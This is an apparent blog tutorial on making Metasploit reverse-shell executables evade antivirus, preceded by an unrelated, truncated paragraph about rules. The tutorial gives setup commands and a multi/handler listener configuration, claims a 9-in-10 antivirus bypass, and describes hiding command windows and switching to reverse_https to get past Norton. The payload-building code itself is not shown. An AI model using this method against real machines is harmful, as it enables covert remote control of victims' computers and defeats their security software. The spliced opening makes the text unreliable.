Rules are established principles or guidelines that dictate how something should be done or how situations should be handled. They are used to regulate behavior, ensure fairness, and maintain order in various contexts, such as society, organizations, games, and social settings. Rules can be formal or informal. Formal rules are codified and enforced by a governing body, such as laws, regulations, or contracts. Informal rules are unwritten and enforced by social pressure, such as social norms or etiquette. Rules can be helpful in many ways. They can: Ensure fairness by creating a level playing field for everyone. Protect people from harm by setting standards of behavior. Maintain order by providing a framework for behavior. However, rules can also be seen as restrictive or unfair. It is important to consider the purpose of a rule before deciding whether or not to follow it. For example, a speed limit may be seen as restrictive, but it is also designed to protect people from harm. A dress...
A basic understanding of how to set up Metasploit's multi/handler
Note: If you do not have the Windows version of MinGW installed, this Post can show you how I do it.
Overview
It's no secret that AV sandboxes our executables, verifies their signatures, and uses other methods to determine whether our "legit" file is malicious or not. (Norton goes a step further and makes sure it doesn't connect to an unknown source without permission.) So how do we get around this?
In this how-to, I'm going to show you my method for AV evasion that uses the msfpayload and msfencode commands to create an executable file. Then we will run the code through some custom commands and "filler" variables to make it less detectable to AV.
Be aware: Metasploit is doing away with msfpayload and msfencode in the coming months, so msfvenom is going to be used instead. If you can modify this process to incorporate msfvenom, please get with me about it. I would love to keep this updated.
Preparation
There are three things you need to do before you run the commands following.
Update Kali:
sudo apt-get update
Create a "ShellCode" folder in the metasploit root folder:
mkdir /usr/share/metasploit-framework/ShellCode
Create an "out" folder in the root folder:
mkdir /root/out
I made the executable in the /root/out folder to keep things neat when creating multiple files. This is optional, but will require some editing of the commands if you choose not to place the finished .exe files there.
The Commands
Below is the code for creating the executable. This was originally just something for me to play with, so it may look a bit messy. Change the IP, port, enumber (encoder iterations), and seed variables as much or as little as you need to fit your scenario.
Be sure that the ShellCode folder is empty prior to running this.
Starting the Listener
Just in case you're reading this and have never started a Metasploit multi/handler module, here's how you do it:
msfconsole use exploit/multi/handler set LHOST xx.xxx.xxx.xx set LPORT 4444 #OPTIONAL set ExitOnSession false exploit -j
Be sure your LHOST is the local IP address, even if you are making the executable connect to an external IP.
Final Thoughts
As stated before, this is a rework of an external article. I have made it into something more usable to me and also added the hidden command window strings that Astr0baby left out on his blog.
I have found this to be effective on multiple Windows OS's using most antivirus softwares and it bypasses it 9/10 times. Be aware that Norton Antivirus will recognize the file ONLY after it's executed and block a "meterpreter/reverse_tcp" attack. One way I've (kind of) gotten around this is to use meterpreter/reverse_httpsin the executable and listener. It still asks the user if they want to allow the connection, but doesn't call it malicious.
So, give it a shot. If you like it, I'm glad I could help. If you have ways to improve it, PM me. I would love to improve on this!
UPDATE: Now in Proper BASH Format.
Ok. so with some of you having problems getting this to work, I decided to make this a script rather Copy/Paste.
Comments
Post a Comment
comment and like